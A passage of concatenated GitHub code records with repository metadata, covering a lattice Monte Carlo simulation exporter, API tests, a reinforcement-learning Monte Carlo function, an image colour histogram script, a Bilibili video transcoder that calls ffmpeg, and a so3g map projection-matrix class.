roi_gray = four_point_transform(gray, docCnt.reshape(4, 2))\n        return f , warped , roi_gray\n    \n    return f , None , None\n\n","repo_name":"gtosama/quizz-scanner","sub_path":"OMRutils.py","file_name":"OMRutils.py","file_ext":"py","file_size_in_byte":5933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}
{"seq_id":"26327629071","text":"class Person:\n    corporation = \"FC Barcelona 2011\"\n    def __init__(self, name, age, stress):\n        self.name = name\n        self.age = age\n        self.stress = stress\n\n    def GetStress(self, how_much_stress):\n        if how_much_stress > 0:\n            self.stress += how_much_stress\n        else:\n            print(\"No stress. 
Happy Life!!!\")\n\n def showInfo(self):\n print(\"I am {}, {} years old, and I have {}stress\".format(self.name, self.age, self.stress))\n\nif __name__ == \"__main__\":\n p1 = Person(\"Boss\", 40, 30)\n p2 = Person(\"Employee\", 29, 30)\n\n p1.showInfo()\n p2.showInfo()\n\n p1.GetStress(50)\n\n p1.showInfo()\n p2.showInfo()\n","repo_name":"otakijae/PythonBasicExamples","sub_path":"class_boss/class_person.py","file_name":"class_person.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"8226734809","text":"\"\"\"\nAuthor: Will Hanstedt\nFilename: latticevol.py\nProject: Research for Irina Mazilu, Ph.D.\n\nA file to run large numbers of trials for the lattice type network.\n\"\"\"\n\nimport Cayley as cy\nimport Cayley.graphics as cg\nimport Cayley.research as cr\nimport xlsxwriter as xl\nimport time\nfrom math import sqrt\ntimesteps = cr.variable('timesteps',int)\ninitial_state = cr.variable('initial_state',str)\nnode_list = cr.variable('node_list',list,int)\ntemp_d = cr.variable('temp_d',dict,float)\n\n\ndef simulate(method, model, length, width, height, alpha, beta, gamma, mu, r1, r2,trials,k,J):\n \"\"\"The important one\"\"\"\n length_tag = length\n width_tag = width\n height_tag = height\n if model == 'full':\n length += 2\n width += 2\n height += 2\n elif model == 'flat':\n length += 2\n width += 2\n elif model == 'linear':\n length += 2\n\n network = cy.Lattice(length,width,height)\n monte = cy.MonteCarlo(network, alpha, beta, gamma, mu, r1, r2)\n run_time = time.time()\n endcol = xl.utility.xl_col_to_name(timesteps+1)\n\n a_tag = \"%.2f\" % alpha\n b_tag = \"%.2f\" % beta\n g_tag = \"%.2f\" % gamma\n m_tag = \"%.2f\" % mu\n r1_tag = \"%.2f\" % r1\n r2_tag = \"%.2f\" % r2\n\n\n if method == 'NN':\n name = (\"NN%dx%dx%d_%sα_%sβ_%sγ.xlsx\" % (length_tag, width_tag, height_tag,\n a_tag, b_tag, g_tag))\n tags = a_tag+'-'+b_tag+'-'+g_tag\n elif method == 'TL':\n name = (\"TL%dx%dx%d_%sμ_%sγ.xlsx\" % (length_tag, width_tag, height_tag,\n m_tag, g_tag))\n tags = m_tag+'-'+g_tag\n elif method == 'EI':\n name = (\"EI%dx%dx%d_%sr1_%sr2_%sγ.xlsx\" % (length_tag, width_tag, height_tag,\n r1_tag, r2_tag, g_tag))\n tags = r1_tag+'-'+r2_tag+'-'+g_tag\n elif method == 'TM':\n tag_list = ()\n for s in range(len(temp_d)):\n tag_list += (\"%.2f\"%temp_d[s],)\n tags = (\"%s_\"*(len(temp_d)-1)+\"%s\") %tag_list\n name = (\"TM%dx%dx%d_\"%(length_tag,width_tag,height_tag)+tags+\".xlsx\")\n else: raise ValueError(\"Method not recognized\")\n print(\"\\n#### RUNNING SIMULATION %s ####\\n\"%(name))\n\n workbook = xl.Workbook(name)\n #JKP: This all can be incorporated with new node feature ability\n density_list = dict() #[trial][timestep] stores overall densities\n state_collect = dict() #[trial] stores final state dictionaries\n node_d = dict() #[trial#][pair index][node index][timestep] stores node values\n overtime = workbook.add_worksheet(\"Over_Time\")\n\n for m in range(trials):\n density_list[m] = [0]*(timesteps+2)\n\n for i in range(trials):\n monte.clear()\n if method == 'TM': monte.randomSpins()\n else:\n if initial_state == \"empty\": monte.emptyDictionary()\n elif initial_state == \"random\": monte.randomDictionary()\n\n if method == 'TM':\n iterate = len(temp_d)\n for d in network.getNodes():\n temp = temp_d[d%iterate]\n network.add(d,temperature=temp)\n\n for t in range(timesteps+1):\n if method == 'NN':\n monte.simulateNN()\n elif method == 'EI':\n monte.simulateEI()\n elif method == 'TL':\n 
monte.simulateTL(t)\n elif method == 'TM':\n monte.simulateTemp()\n\n ### FOR RECORDING DATA ###\n state_collect[i] = monte.simData(monte.getTimesteps()-1) #JKP updated\n\n node_d[i] = list()\n for n in range(len(node_list)):\n node_d[i].append([])\n for f in range(len(node_list[n])):\n node_d[i][n].append([])\n for t in range(timesteps+1):\n if method == 'TM':\n node_d[i][n][f].append((monte.simData(t)[node_list[n][f]]))\n else:\n node_d[i][n][f].append(2*(monte.simData(t)[node_list[n][f]])-1)\n\n for y in range(monte.getTimesteps()): #JKP: Follows new updates\n sum_t = 0 # Sum of relevant nodes at one timestep\n if model == 'full':\n coor_d = network.getNodeFeature('coords')\n for x in network: ## # gives adjusted, can't use len(monte.network)\n if not (0 in coor_d[x] or coor_d[x][0] == length-1 or\\\n coor_d[x][1] == width-1 or coor_d[x][2] == height-1):\n sum_t += monte.simData(y)[x] #JKP: Follows new updates\n elif model == 'flat':\n coor_d = network.getNodeFeature('coords')\n for x in network:\n c = coor_d[x]\n if not (0 in c[0:2] or c[0] == length-1 or c[1] == width-1):\n sum_t += monte.simData(y)[x]\n elif model == 'linear':\n coor_d = network.getNodeFeature('coords')\n for x in network:\n if not(coor_d[x][0] == 0 or coor_d[x][0] == length-1):\n sum_t += monte.simData(y)[x]\n elif model == 'loop':\n for x in network:\n sum_t += monte.simData(y)[x]\n dens_t = sum_t/((length_tag)*(width_tag)*(height_tag)) ## # Density at one timestep\n density_list[i][y] = dens_t\n\n if trials <= 10: # Trial-by-trial is best for small sets\n if model == 'loop':\n worksheet = workbook.add_worksheet(\"Data trial %d\" % (i+1))\n worksheet.write(0,0,\"Timestep\")\n for x in network:## #\n worksheet.write(x+1,0,\"Node \"+str(x))\n for y in range(monte.getTimesteps()): #JKP: Follows new updates\n worksheet.write(0,y+1,str(y))\n for y in range(monte.getTimesteps()): #JKP: Follows new updates\n for x in network:\n worksheet.write(x+1,y+1,monte.simData(y)[x]) #JKP: Follows new updates\n\n if (trials >= 100) and ((10*i)%trials == 0):\n try:\n ti = (time.time()-run_time)\n print(\"Trial: \"+str(i))\n print(str(ti)+\" secs\")\n except NameError: pass\n\n corr_t = dict()\n prod_t = dict() ### Next three dicts are temporary, for diagnosis\n n0_t = dict()\n n1_t = dict()\n for n in range(len(node_list)):\n corr_t[n] = [0]*(timesteps+1)\n prod_t[n] = [0]*(timesteps+1)\n n0_t[n] = [0]*(timesteps+1)\n n1_t[n] = [0]*(timesteps+1)\n for t in range(timesteps+1):\n sum_prod = 0\n n1 = 0\n n2 = 0\n for i in range(trials):\n sum_prod += (node_d[i][n][0][t])*(node_d[i][n][1][t])\n n1 += node_d[i][n][0][t]\n n2 += node_d[i][n][1][t]\n corr_t[n][t] = (sum_prod/trials)-(n1/trials)*(n2/trials)\n prod_t[n][t] = (sum_prod/trials)\n n0_t[n][t] = (n1/trials)\n n1_t[n][t] = (n2/trials)\n\n for n in range(len(node_list)): # For recording correlations\n sheetname = (\"Nodes_%d+%d\" %(node_list[n][0],node_list[n][1]))\n chartrange = '='+sheetname+'!$B$2:$'+endcol+'$2'\n timerange = '='+sheetname+'!$B$2:$'+endcol+'$2'\n corr_sheet = workbook.add_worksheet(sheetname)\n corr_sheet.write(0,0,\"Timestep\")\n corr_sheet.write(1,0,\"Correlation\")\n corr_sheet.write(5,0,\"Product\")\n corr_sheet.write(6,0,\"Node %d\" %(node_list[n][0]))\n corr_sheet.write(7,0,\"Node %d\" %(node_list[n][1]))\n corr_chart = workbook.add_chart({'type':'line'})\n corr_sheet.insert_chart('I8', corr_chart)\n corr_chart.set_title({'name':'Correlation'})\n corr_chart.set_x_axis({'name':'Timesteps'})\n corr_chart.set_y_axis({'name':'Correlation'})\n 
corr_chart.add_series({'values':chartrange,\n 'name':'Correlation'})\n for t in range(timesteps+1):\n corr_sheet.write(0,t+1,t)\n corr_sheet.write(1,t+1,corr_t[n][t])\n corr_sheet.write(5,t+1,prod_t[n][t])\n corr_sheet.write(6,t+1,n0_t[n][t])\n corr_sheet.write(7,t+1,n1_t[n][t])\n # Average density over time\n overtime.write(0,0,\"Timestep\")\n data_tag = name\n overtime.write(1,0,data_tag)\n chartrange = '=Over_Time!$B$2:$'+endcol+'$2'\n over_chart = workbook.add_chart({'type':'line'})\n overtime.insert_chart('I8',over_chart)\n over_chart.set_title({'name':'Density'})\n over_chart.set_x_axis({'name':'Timesteps'})\n over_chart.set_y_axis({'name':'Density'})\n over_chart.add_series({'values':('=Over_Time!$B$2:$'+endcol+'$2'),\n 'name':'=Over_Time!$A$2'})\n over_chart.add_series({'values':('=Over_Time!$B$3:$'+endcol+'$3'),\n 'name':'=Over_Time!$A$3'})\n over_chart.add_series({'values':('=Over_Time!$B$4:$'+endcol+'$4'),\n 'name':'=Over_Time!$A$4'})\n if trials <= 10:\n for t in range(trials):\n overtime.write(t+5,0,\"Trial \"+str(t+1))\n for m in range(timesteps+1):\n overtime.write(t+5,m+1,density_list[t][m])\n else:\n overtime.write(6,0,\"Trials: \"+str(trials))\n for m in range(timesteps+1):\n t_sum = 0\n overtime.write(0,m+1,m)\n for t in range(trials):\n t_sum += density_list[t][m]\n t_av = t_sum/trials\n overtime.write(1,m+1,t_av)\n\n workbook.close()\n\n\ndef main():\n print(\"To change the default timesteps, initial state, temperatures, or\"+\\\n \" nodes for comparison, change the values in the variables.txt file.\")\n print(\"Enter 'full', 'flat', 'linear', or 'loop' for model type.\")\n model = input(\"Model: \").lower()\n if model in ['linear','loop']:\n print(\"Enter 'NN', 'TL', 'EI', or 'TM' for nearest neighbors, total \" +\n \"lattice density, empty interval, or temperature methods.\")\n else:\n print(\"Enter 'NN', 'TL', or 'EI' for nearest neighbors, total \" +\n \"lattice density, or empty interval methods.\")\n method = input(\"Method: \").upper()\n\n length = int(input(\"Length: \"))\n if model != 'linear' and model != 'loop':\n width = int(input(\"Width: \"))\n else: width = 1\n if model == 'full':\n height = int(input(\"Height: \"))\n else: height = 1\n\n trials = int(input(\"Number of trials: \"))\n if method == 'NN':\n alpha = float(input(\"Alpha value: \"))\n beta = float(input(\"Beta value: \"))\n gamma = float(input(\"Value for gamma: \"))\n mu = r1 = r2 = 0\n k_c = J_c = 1\n elif method == 'TL':\n mu = float(input(\"Mu value: \"))\n gamma = float(input(\"Value for gamma: \"))\n alpha = beta = r1 = r2 = 0\n k_c = J_c = 1\n elif method == 'EI':\n print(\"R1 should be less than R2 for electrostatic models.\")\n r1 = float(input(\"R1 value: \"))\n r2 = float(input(\"R2 value: \"))\n gamma = float(input(\"Value for gamma: \"))\n alpha = beta = mu = 0\n k_c = J_c = 1\n elif method == 'TM':\n print(\"Retrieving temperatures from change_me.py...\")\n choose = input(\"Change k & J values from 1? 
[Y/N] \").upper()\n if choose == 'Y':\n k_c = float(input(\"k value: \"))\n J_c = float(input(\"J value: \"))\n else: k_c = J_c = 1\n alpha = beta = gamma = mu = r1 = r2 = 0\n else: raise ValueError(\"Method not recognized\")\n start_time = time.time()\n simulate(method, model, length, width, height, alpha, beta, gamma, mu, r1,r2,trials,k_c,J_c)\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n\nif __name__ == '__main__':\n main()\n","repo_name":"noe98/Cayley","sub_path":"research/latticevol.py","file_name":"latticevol.py","file_ext":"py","file_size_in_byte":11733,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"76"} +{"seq_id":"18773907462","text":"import time\n\nimport pandas as pd\n\n\nfrom pyhcomet import cases, price_sets, slates\n\n\ndef test_get_cases():\n res = cases.get_cases()\n assert res is not None\n if len(res) > 0:\n id = res[\"ID\"].iloc[0]\n res = cases.get_case(id)\n assert res is not None\n\n\ndef get_case_template(price_set_id: int, slate_id: int, region: str):\n case_name = f\"test_case_{pd.to_datetime('now', utc=True).strftime('%y%m%d%I%M%S')}\"\n case_name = \"ga_test\"\n template = cases.case_template(\n SimplePriceSetID=price_set_id, SlateID=slate_id, RegionID=region, Name=case_name\n )\n return template\n\n\ndef test_submit_case():\n price_set_id = price_sets.get_price_sets(region_id=\"NWE\")[\"ID\"].iloc[0]\n slate_id = slates.get_slates()[\"ID\"].iloc[0]\n template = get_case_template(\n price_set_id=price_set_id, slate_id=slate_id, region=\"NWE\"\n )\n template[\"Name\"] = \"ga_test\"\n case_id = cases.submit_case(case=template)\n assert case_id is not None\n time.sleep(1)\n res = cases.delete_case(case_id=case_id)\n assert res == \"No Content\"\n","repo_name":"aeorxc/pyhcomet","sub_path":"tests/test_cases.py","file_name":"test_cases.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"4063959813","text":"#!/usr/bin/env python3\n'''Monte Carlo'''\nimport numpy as np\n\n\ndef monte_carlo(env, V, policy, episodes=5000, max_steps=100,\n alpha=0.1, gamma=0.99):\n '''performs the Monte Carlo algorithm:\n\n Args:\n env is the openAI environment instance\n V is a numpy.ndarray of shape (s,) containing the value estimate\n policy is a function that takes in a state and returns the next action\n to take\n episodes is the total number of episodes to train over\n max_steps is the maximum number of steps per episode\n alpha is the learning rate\n gamma is the discount rate\n\n Returns: V, the updated value estimate\n '''\n\n states = V.shape[0]\n\n for i in range(episodes):\n s = env.reset()\n list_episodes = []\n\n for j in range(max_steps):\n action = policy(s)\n new, reward, done, info = env.step(action)\n list_episodes.append([s, action, reward, new])\n if done:\n break\n s = new\n episode = np.array(list_episodes, dtype=int)\n G = 0\n\n for j, step in enumerate(episode[::-1]):\n s, action, reward, s_next = step\n G = gamma * G + reward\n\n if s not in episode[:i, 0]:\n V[s] = V[s] + alpha * (G - V[s])\n\n return V\n","repo_name":"gcifuentess/holbertonschool-machine_learning","sub_path":"reinforcement_learning/0x02-temporal_difference/0-monte_carlo.py","file_name":"0-monte_carlo.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"37535097122","text":"from PIL import Image, ImageOps\nimport numpy as np\nfrom 
skimage import color\nimport matplotlib.pyplot as plt\nimport cv2 as cv\n\ndef rgb2lab_show(path):\n    im = Image.open(path).convert('RGB')\n    # im = ImageOps.grayscale(im)\n    im = np.array(im)\n    # im = np.tile(im, (3, 1, 1)).transpose(1, 2, 0)\n    lab = color.rgb2lab(im).astype(np.float32)\n    L = lab[..., 0]\n    A = lab[..., 1]\n    B = lab[..., 2]\n    fig, axes = plt.subplots(1, 4, figsize=(12, 4))\n    axes = axes.reshape(-1)\n    for ax, img in zip(axes, [L, A, B]):\n        ax.hist(img.reshape(-1), bins=256)\n        # ax.imshow(img, cmap='gray')\n        # ax.set_axis_off()\n    # axes[3].hist(L.reshape(-1), bins=256)\n    plt.show()\n\nif __name__ == '__main__':\n    rgb2lab_show('10001570.jpg')\n    # rgb2lab_show('20220428181759721.png')\n","repo_name":"kigane/SyncFile","sub_path":"Tool/rgb2lab_show.py","file_name":"rgb2lab_show.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"39147986222","text":"import json\nimport os\nimport danmaku2ass\nimport sys\n\n\nffmpeg = 'ffmpeg\\\\ffmpeg.exe'\nfontsize = 50\n\ndef FindAllVideo(file_root):\n    videolist = []\n    for root, dirs, files in os.walk(file_root, topdown=False):\n        for name in files:\n            if name == 'entry.json':\n                with open(os.path.join(root, name), 'r', encoding='utf-8') as f:\n                    videoinfo = json.loads(f.read())\n                title = videoinfo['title'].replace(' ','').replace('\\\\','-').replace('/','-')\n                videofile = root + r'\\80\\video.m4s'\n                audiofile = root + r'\\80\\audio.m4s'\n                danmufile = root + r'\\danmaku.xml'\n                if os.path.isfile(videofile) and os.path.isfile(audiofile):\n                    onevideo = {'videofile': videofile, 'audiofile': audiofile, 'title': title,\n                                'width': videoinfo['page_data']['width'], 'height': videoinfo['page_data']['height']}\n                    if os.path.isfile(danmufile):\n                        onevideo['danmu'] = danmufile\n                    videolist.append(onevideo)\n    return videolist\n\n\ndef CodeVideo(videolist, outputdir, codetype='.mp4'):\n    if outputdir[-1] != '\\\\':\n        outputdir += '\\\\'\n    if codetype[0] != '.':\n        codetype = '.'+ codetype\n    for onevideo in videolist:\n        title = onevideo['title']\n        # Process the danmaku (bullet comment) file\n        if 'danmu' in onevideo:\n            try:\n                danmaku2ass.Danmaku2ASS(input_format='Bilibili',input_files=onevideo['danmu'], output_file=outputdir + title + '.ass',\n                                        stage_width=onevideo['width'], stage_height=onevideo['height'],\n                                        reserve_blank=480,\n                                        font_size=fontsize, text_opacity=0.6, duration_marquee=12.0, duration_still=6.0)\n            except Exception as e:\n                return 'Error [danmaku conversion failed] because:\\n' + str(e)\n        # Process the video\n        # ffmpeg -i video2.avi -i audio.mp3 -vcodec copy -acodec copy output.avi\n        cmd = r'.\\\"%s\" -i \"%s\" -i \"%s\" -vcodec copy -acodec copy \"%s\"' % (\n            ffmpeg, onevideo['videofile'], onevideo['audiofile'], outputdir + title + codetype)\n        os.system(cmd)\n        #res = os.popen(cmd)\n    return 'Encoding finished'\n\nif __name__ == '__main__':\n    CodeVideo(FindAllVideo(r'\\\\Desktop\\\\新建文件夹'), '\\\\Desktop\\\\新建文件夹\\\\75801774')\n","repo_name":"yushao123/BilibiliTranscoding","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2437,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"32428245237","text":"import so3g.proj\nimport numpy as np\nimport scipy\nfrom pixell import enmap, tilemap\n\nfrom .helpers import _get_csl, _valid_arg, _not_both\nfrom . import helpers\n\nimport logging\nlogger = logging.getLogger(__name__)\n\n\nclass P:\n    \"\"\"Projection Matrix.\n\n    This class provides functions to apply a Projection Matrix (or its\n    transpose). 
The Projection Matrix, P, also sometimes called the\n Pointing Matrix, describes how a vector of time-ordered\n measurements d are determined by a vector of map pixels m::\n\n d = P m\n\n We are working in aspace, of course, where d is not a vector, but\n rather an array of vectors, and m is not a vector, it's a\n multi-dimensional array with two of the dimensions corresponding\n to a rectangular pixelization of the sky.\n\n If you are making filter+bin maps, you will want to use these functions:\n\n - to_map\n - to_inverse_weights\n - remove_weights\n\n If you are solving for a map iteratively you will probably just need:\n\n - to_map\n - from_map\n\n Important keyword arguments that are used in many functions:\n\n - tod: The AxisManager from which signal and pointing information\n should be taken.\n - signal: The array to use for time-ordered signal. If a string,\n it will be looked up in tod. Defaults to 'signal'.\n - det_weights: A vector of floats representing the inverse\n variance of each detector, under the assumption of white noise.\n - cuts: A RangesMatrix that identifies samples that should be\n excluded from projection operations.\n - comps: the component code (e.g. 'T', 'TQU', 'QU', ...) that\n specifies the spin-components being modeled in the map.\n - dest: the appropriately shaped array in which to place the\n computed result (as an alternative to allocating a new object to\n store the result).\n\n Note that in the case of det_weights and cuts, the Projection\n Matrix may also have cached values for those. It is an error to\n pass either of these as a keyword argument to a projection routine\n if a value has been cached for it.\n\n Objects of this class cache certain pre-computed information (such\n as the rotation taking boresight coordinates to celestial\n coordinates) and certain context-dependent settings (such as a map\n shape, WCS, and spin-component configuration). You may want to\n inspect or borrow these results, perhaps to reuse them when\n constructing new instances with slight modifications. The cached\n attributes are:\n\n - sight: A CelestialSightLine, representing the boresight pointing\n in celestial coordinates. [samps]\n - fp: G3VectorQuat representing the focal plane offsets of each\n detector. [dets]\n - geom: The target map geometry. This is a pixell.enmap.Geometry\n object, with attributes .shape and .wcs; or possibly (if tiled)\n a pixell.tilemap.TileGeometry.\n - comps: String indicating the spin-components to include in maps.\n E.g., 'T', 'QU', 'TQU'.\n - rot: quat giving an additional fixed rotation to apply to get\n from boresight to celestial coordinates. Not for long...\n - cuts (optional): RangesMatrix indicating what samples to exclude\n from projection operations (the indicated samples have\n projection matrix element 0 in all components). [dets, samps]\n - threads (optional): RangesMatrix that assigns ranges of samples\n to specific threads. This is necessary for TOD-to-map\n operations that use OpenMP. [dets, samps]\n - det_weights (optional): weights (one per detector) to apply to\n time-ordered data when binning a map (and also when binning a\n weights matrix). [dets]\n - interpol (optional): How to interpolate the values for samples\n between pixel centers. Forwarded to Projectionist. 
Valid\n options are:\n\n - None, 'nn' or 'nearest': Standard nearest neighbor mapmaking.\n - 'lin' or 'bilinear': Linearly interpolate between the four\n closest pixels.\n\n Default: None\n\n These things can be updated freely, with the following caveats:\n\n - If the number of \"samples\" or \"detectors\" is changed in one\n attribute, it will need to be changed in the others to match.\n - The threads attribute, if in use, needs to be recomputed if\n anything about the pointing changes (this includes map geometry\n but does not include map components).\n\n Setting the \"threads\" argument to certain special values will\n activate different thread assignment algorithms:\n\n - False: do not use threading; to_map projections will be\n single-threaded.\n - True: use the default algorithm, 'domdir'.\n - None: same as True.\n - 'simple': compute self.threads using simple map-stripe\n algorithm.\n - 'domdir': compute self.threads using dominant-direction\n algorithm (recommended).\n - 'tiles': for tiled geometries, design self.threads such that\n each tile is assigned to a single thread (each thread may be in\n charge of multiple tiles).\n\n \"\"\"\n def __init__(self, sight=None, fp=None, geom=None, comps='T',\n cuts=None, threads=None, det_weights=None, interpol=None):\n self.sight = sight\n self.fp = fp\n self.geom = wrap_geom(geom)\n self.comps = comps\n self.cuts = cuts\n self.threads = threads\n self.active_tiles = None\n self.det_weights = det_weights\n self.interpol = interpol\n\n @classmethod\n def for_tod(cls, tod, sight=None, fp=None, geom=None, comps='T',\n rot=None, cuts=None, threads=None, det_weights=None,\n timestamps=None, focal_plane=None, boresight=None,\n boresight_equ=None, wcs_kernel=None, weather='typical',\n site='so', interpol=None):\n \"\"\"Set up a Projection Matrix for a TOD. 
This will ultimately call\n the main P constructor, but some missing arguments will be\n extracted from tod and computed along the way.\n\n To determine the boresight pointing in celestial coordinates\n (ultimately passed to constructor as sight=), the first\n non-None item in the following list is used:\n\n - the sight= keyword argument.\n - the boresight_equ= keyword argument.\n - the boresight= keyword argument\n - tod.get('boresight_equ')\n - tod.get('boresight')\n\n If the map geometry geom is not specified, but the wcs_kernel\n is provided, then get_footprint will be called to determine\n the geom.\n\n \"\"\"\n\n if sight is None:\n if boresight_equ is None:\n if boresight is None:\n boresight_equ = tod.get('boresight_equ')\n if boresight_equ is not None:\n sight = so3g.proj.CelestialSightLine.for_lonlat(\n boresight_equ.ra, boresight_equ.dec, boresight_equ.get('psi'))\n else:\n timestamps = _valid_arg(timestamps, 'timestamps', src=tod)\n boresight = _valid_arg(boresight, 'boresight', src=tod)\n assert(boresight is not None)\n sight = so3g.proj.CelestialSightLine.az_el(\n timestamps, boresight.az, boresight.el, roll=boresight.roll,\n site=site, weather=weather)\n else:\n sight = _get_csl(sight)\n\n # Apply a rotation from equatorial to map WCS coordinates.\n if rot is not None:\n sight.Q = rot * sight.Q\n\n # Set up the detectors in the focalplane\n fp = _valid_arg(focal_plane, 'focal_plane', src=tod)\n fp = so3g.proj.quat.rotation_xieta(fp.xi, fp.eta, fp.get('gamma'))\n\n if geom is None and wcs_kernel is not None:\n geom = helpers.get_footprint(tod, wcs_kernel, sight=sight)\n\n return cls(sight=sight, fp=fp, geom=geom, comps=comps,\n cuts=cuts, threads=threads, det_weights=det_weights,\n interpol=interpol)\n\n @classmethod\n def for_geom(cls, tod, geom, comps='TQU', timestamps=None,\n focal_plane=None, boresight=None, rot=None, cuts=None):\n \"\"\"Deprecated, use .for_tod.\"\"\"\n return cls.for_tod(tod, geom=geom, comps=comps,\n timestamps=timestamps, focal_plane=focal_plane,\n boresight=boresight, rot=rot, cuts=cuts)\n\n def zeros(self, super_shape=None, comps=None):\n \"\"\"Returns an enmap concordant with this object's configured geometry\n and component count.\n\n Args:\n super_shape (tuple): The leading dimensions of the array.\n If None, self._comp_count(comps) is used.\n comps: The component list, to override self.comps.\n\n Returns:\n An enmap with shape super_shape + self.geom.shape.\n\n \"\"\"\n if super_shape is None:\n super_shape = (self._comp_count(comps), )\n if self.tiled:\n # Need to fully resolve tiling to get occupied tiles.\n proj, _ = self._get_proj_threads()\n return tilemap.from_tiles(proj.zeros(super_shape), self.geom)\n else:\n proj = self._get_proj()\n return enmap.ndmap(proj.zeros(super_shape), wcs=self.geom.wcs)\n\n def to_map(self, tod=None, dest=None, comps=None, signal=None,\n det_weights=None, cuts=None, eigentol=None):\n \"\"\"Project time-ordered signal into a map. This performs the operation\n\n m += P d\n\n and returns m.\n\n Args:\n tod: AxisManager; possible source for 'signal', 'det_weights'.\n dest (enmap): the map or array into which the data should be\n accumulated. (If None, a new enmap is created and\n initialized to zero.)\n signal: The time-ordered data, d. If None, tod.signal is used.\n det_weights: The per-detector weight vector. If None,\n self.det_weights will be used; if that is not set then\n uniform weights of 1 are applied.\n cuts: Sample cuts to exclude from processing. 
If None,\n self.cuts is used.\n eigentol: This is ignored.\n\n \"\"\"\n signal = _valid_arg(signal, 'signal', src=tod)\n det_weights = _not_both(det_weights, self.det_weights,\n 'det_weights', dtype='float32')\n cuts = _not_both(cuts, self.cuts, 'cuts')\n\n if comps is None: comps = self.comps\n if dest is None: dest = self.zeros(comps=comps)\n\n proj, threads = self._get_proj_threads(cuts=cuts)\n proj.to_map(signal, self._get_asm(), output=self._prepare_map(dest),\n det_weights=det_weights, comps=comps, threads=unwrap_ranges(threads))\n return dest\n\n def to_weights(self, tod=None, dest=None, comps=None, signal=None,\n det_weights=None, cuts=None):\n \"\"\"Computes the weights matrix for the uncorrelated noise model and\n returns it. I.e.:\n\n W += P N^-1 P^T\n\n and returns W. Here the inverse noise covariance has shape\n (n_dets), and carries a single weight (1/var) value for each\n detector.\n\n Args:\n tod (AxisManager): possible source for det_weights.\n dest (enmap): the map or array into which the weights should\n be accumulated. (If None, a new enmap is created and\n initialized to zero.)\n det_weights: The per-detector weight vector. If None,\n tod.det_weights will be used; if that is not set then\n uniform weights of 1 are applied.\n cuts: Sample cuts to exclude from processing. If None,\n self.cuts is used.\n\n \"\"\"\n det_weights = _not_both(det_weights, self.det_weights,\n 'det_weights', dtype='float32')\n cuts = _not_both(cuts, self.cuts, 'cuts')\n\n if comps is None:\n comps = self.comps\n if dest is None:\n _n = self._comp_count(comps)\n dest = self.zeros((_n, _n))\n\n proj, threads = self._get_proj_threads(cuts=cuts)\n proj.to_weights(self._get_asm(), output=self._prepare_map(dest),\n det_weights=det_weights, comps=comps, threads=unwrap_ranges(threads))\n return dest\n\n def to_inverse_weights(self, weights_map=None, tod=None, dest=None,\n comps=None, signal=None, det_weights=None, cuts=None,\n eigentol=1e-4,\n ):\n \"\"\"Compute an inverse weights map, W^-1, from a weights map. If no\n weights_map is passed in, it will be computed by calling\n to_weights, passing through all other arguments.\n\n \"\"\"\n if weights_map is None:\n logger.info('to_inverse_weights: calling .to_weights')\n weights_map = self.to_weights(\n tod=tod, comps=comps, signal=signal, det_weights=det_weights, cuts=cuts)\n\n # Works for both normal and tiled maps\n if dest is None: dest = np.zeros_like(weights_map)\n dest[:] = helpers._invert_weights_map(weights_map, eigentol=eigentol, UPLO='U')\n return dest\n\n def remove_weights(self, signal_map=None, weights_map=None, inverse_weights_map=None,\n dest=None, **kwargs):\n \"\"\"Apply the inverse weights matrix to a signal map.\n\n m' = W^-1 m\n\n If W or m are not fully specified, they will be computed by\n calling other routines inline, with relevant arguments passed\n through.\n\n Args:\n signal_map: The map m to filter.\n inverse_weights_map: the matrix W^-1 to apply to the map.\n Shape should be (n_comp, n_comp, n_row, n_col), but only\n the upper diagonal in the first two dimensions needs to be\n populated. If this is None, then \"weights_map\" is taken\n as W, and it will be inverted and applied.\n weights_map: the matrix W. Shape should be (n_comp, n_comp,\n n_row, n_col), but only the upper diagonal in the first\n two dimensions needs to be populated. 
If this is None,\n then W will be computed by a call to\n\n \"\"\"\n if inverse_weights_map is None:\n inverse_weights_map = self.to_inverse_weights(weights_map=weights_map, **kwargs)\n if signal_map is None:\n signal_map = self.to_map(**kwargs)\n\n if dest is None: dest = np.zeros_like(signal_map)\n dest[:] = helpers._apply_inverse_weights_map(inverse_weights_map, signal_map)\n return dest\n\n def from_map(self, signal_map, dest=None, comps=None, wrap=None,\n cuts=None, tod=None):\n \"\"\"Project from a map into the time-domain.\n\n d += P m\n\n Args:\n signal_map: The map m. This can probably be just about\n anything supported by so3g.proj; it doesn't have to match\n the internally configured geometry.\n dest: Time-ordered data array, shape (dets, samps). If\n None, a new array will be created to hold the result.\n Otherwise, data are *accumulated* into d, so clear it\n manually if you are trying to do d = P m.\n comps (str): Projection components, if you want to override.\n cuts: RangesMatrix, shape (dets, samps) flagging samples\n that should not be populated. Defaults to empty.\n wrap (str): If specified, wraps the result as tod[wrap]\n (after removing whatever was in there).\n\n Returns:\n The dest array.\n\n Notes:\n Since this is a set of one-to-many operation, OpenMP can\n be used without carefully assigning samples to threads.\n\n \"\"\"\n assert cuts is None # whoops, not implemented.\n\n proj = self._get_proj()\n if comps is None:\n comps = self.comps\n tod_shape = (len(self.fp), len(self.sight.Q))\n if dest is None:\n dest = np.zeros(tod_shape, np.float32)\n assert(dest.shape == tod_shape) # P.fp/P.sight and dest argument disagree\n proj.from_map(self._prepare_map(signal_map), self._get_asm(), signal=dest, comps=comps)\n\n if wrap is not None:\n if wrap in tod:\n del tod[wrap]\n tod.wrap(wrap, dest, [(0, 'dets'), (1, 'samps')])\n\n return dest\n\n @property\n def tiled(self):\n \"\"\"Duck-typing to see if we're tiled or not. Reload-safe, unlike 